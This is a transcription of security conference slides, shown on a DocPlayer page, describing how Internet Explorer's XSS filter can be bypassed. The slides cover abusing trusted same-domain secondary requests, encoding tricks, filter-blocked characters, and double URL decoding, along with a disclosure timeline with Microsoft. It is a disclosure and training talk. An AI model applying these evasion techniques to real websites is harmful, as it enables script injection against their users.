Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea



Similar documents
Bypassing Internet Explorer s XSS Filter

Finding XSS in Real World

Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER

A Tale of the Weaknesses of Current Client-Side XSS Filtering

XSS Lightsabre techniques. using Hackvertor

Web Application Attacks And WAF Evasion

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Project 2: Web Security Pitfalls

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Check list for web developers

Next Generation Clickjacking

Webapps Vulnerability Report

Recent Advances in Web Application Security

Introduction to Ingeniux Forms Builder. 90 minute Course CMSFB-V6 P

Sichere Webanwendungen mit Java

Protection, Usability and Improvements in Reflected XSS Filters

Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.

Hack-proof Your Drupal App. Key Habits of Secure Drupal Coding

Universal XSS via IE8s XSS Filters

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

CTF Web Security Training. Engin Kirda

Overview. How It Works

Security starts in the head(er)

Relax Everybody: HTML5 Is Securer Than You Think

Web-Application Security

Cross-Site Scripting

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Weird New Tricks for Browser Fingerprinting. yan ToorCon 2015

XSS PROTECTION CHEATSHEET FOR DEVELOPERS V1.0. Author of OWASP Xenotix XSS Exploit Framework opensecurity.in

Secure development and the SDLC. Presented By Jerry

AJAX Storage: A Look at Flash Cookies and Internet Explorer Persistence

We automatically generate the HTML for this as seen below. Provide the above components for the teaser.txt file.

A Tale of the Weaknesses of Current Client-side XSS Filtering

The Risks of Client-Side Data Storage From cookie to database

Web Application Worms & Browser Insecurity

Protecting Web Applications and Users

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

HTML5. Eoin Keary CTO BCC Risk Advisory.

Abusing HTML5. DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA

Revisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist

CMP3002 Advanced Web Technology

Phishing by data URI

Web Application Security

Web Application Guidelines

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

The Image that called me

Intrusion detection for web applications

Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

Module 6 Web Page Concept and Design: Getting a Web Page Up and Running

Full URLs, specified in RFC 3986 have up to eight parts.

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

Performance Report for: Report generated: Friday, April 24, 2015, 7:29 AM (via API)

Preparing for the Cross Site Request Forgery Defense

The Prevalence of Flash Vulnerabilities on the Web

(WAPT) Web Application Penetration Testing

Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map

DIPLOMA IN WEBDEVELOPMENT

Criteria for web application security check. Version

Cross Site Scripting Prevention


E-Commerce: Designing And Creating An Online Store

Integrating Luceo with your Website Using iframes. Version 4.1 Jan 15, 2013

How To Use Mugeda Content

MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July Contents

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Customising Your Mobile Payment Pages

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

Short notes on webpage programming languages

HTTPParameter Pollution. ChrysostomosDaniel

Lesson Review Answers

MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May Contents

Hack Yourself First. Troy troyhunt.com

Administrator s Guide

Hack Proof Your Webapps

THE CLIENT SPEC SHEET

Tableau Server Trusted Authentication

OWASP TOP 10 ILIA

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Esigate Module Documentation

Analysis of Browser Defenses against XSS Attack Vectors

UI Redressing and Clickjacking. About click fraud and data theft

Cyber Security Workshop Encryption Reference Manual

TCP/IP Networking, Part 2: Web-Based Control

Web Application Security: Exercise Development Approaches

By Glenn Fleishman. WebSpy. Form and function

Security Test s i t ng Eileen Donlon CMSC 737 Spring 2008

Auditing WebObjects applications. Ilja van Sprundel

Using a Malicious Proxy to Pilfer Data & Wreak Havoc. Edward J. Zaborowski ed@thezees.net

Uploaded images filter evasion for carrying out XSS attacks

The Top Web Application Attacks: Are you vulnerable?

Transcription:

Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea

Bypass: History Explanation: What Is Going On Process: Things To Look For Demos: alert(1) Done Live (hopefully) CSP: Content Security Policy End Notes: (Bonus Bypass?)

Late Friday, August 23 rd, 2013 Finishing Webapp Assessment Visiting site in different browsers, looking for browser-specific functionality

Previously found reflective XSS vulnerability Page reflects injection JavaScript block further up the page Is page rendered within iframe from specific page? ( self!= parent ) No? Redirect to page with iframe and remove injection

Page in iframe defined from URL/URI query string parameter Injection from URL/URI parameter value lands in iframe definition which then calls vulnerable page with injection and XSS executes on vulnerable page

Vuln initially found with Firefox Looked for browser-specific functionality Tested Internet Explorer last Decided to poke at the XSS vuln in Internet Explorer

Standard XSS training Hex entities decoded in attribute space param= value part of html tag Try an injection that doesn t look like <script>alert(1)</script> Encode a few characters, enter injection into Internet Explorer

Weekend: Built Deliberately Vulnerable PHP code to recreate bypass Reported to Microsoft: August 26 th, 2013 Case #15412 Response from Microsoft: October 4 th, 2013

Internet Explorer s XSS filter has a Trust model that determines which requests are subject to the filter Some requests are not trusted: subject to filter Some requests are trusted: not subject to filter Abuse that trust: Bypass the filter

Primary Request with injection is made Primary Request doesn t cause IMMEDIATE JavaScript code execution Primary Request is subject to the filter Secondary Request within the same domain is induced with data from the Primary Request Secondary Request does cause JavaScript code execution Secondary Request is trusted and not subject to the filter

Looking for functionality on site that will allow a secondary request onto the same domain Iframes, Frames Form submissions href attributes JavaScript Redirects Places where both <a> and </a> can be injected

Hiding data from Primary Request: Landing in Attribute space? Hexadecimal: &#xyy; - HTML 4.0 1998 Decimal: &#ZZ; - HTML 2.0 1995 Named Entity: &ww; - HTML 2.0 1995 URL/URI: %VV RFC 1630 1994 Landing in JavaScript space? URL/URI: %VV RFC 1630 1994

Filter doesn t like. Periods <form> <frame> <iframe> Filter sometimes permits, sometimes doesn t: () [] {} Parenthesis, Square Brackets, Curly Brackets The word style Can use class instead (see demos)

Content Security Policy A policy language used to declare a set of content restrictions for a web resource, and a mechanism for transmitting the policy from a server to a client where the policy is enforced. Content Security Policy 1.0 http://www.w3.org/tr/csp/ Maybe no more XSS (if done correctly)??? What about Internet Explorer?

Only Internet Explorer 10 & 11 have any support for Content Security Policy Content Security Policy support in Internet Explorer 10 & 11 is limited Uses older X-Content-Security-Policy header instead of official Content-Security-Policy Source: http://content-security-policy.com Does Content Security Policy currently help? (no)

Microsoft s No Fix response: Two different reasons given: First Reason (given back in Oct 2013): Requires special functionality Not actually true everything used in bypass has been part of official HTML spec since at least 1998 Second Reason (given later, Dec 2013): Requires user interaction Partially true, but not fully true

Bonus Bypass: If webapp performs double-url/uri decoding, Internet Explorer s XSS filter doesn t catch it Demo (if time permits)

The Playground Deliberately vulnerable pages Can be used for training on bypass

Links: http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8- xss-filter-design-philosophy-in-depth.aspx http://threatpost.com/bypass-of-internet-explorer-crosssite-scripting-filter-possible/103106 http://gazebelwerks.net/internetexplorer/ https://github.com/rtwaysea/ie-xss-filter-bypass-2.0

Any Questions? http://gazebelwerks.net/internetexplorer/ https://github.com/rtwaysea/ie-xss-filter-bypass-3.0 @RTWaysea carlos.munoz@whitehatsec.com Thank You ToorCon!

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information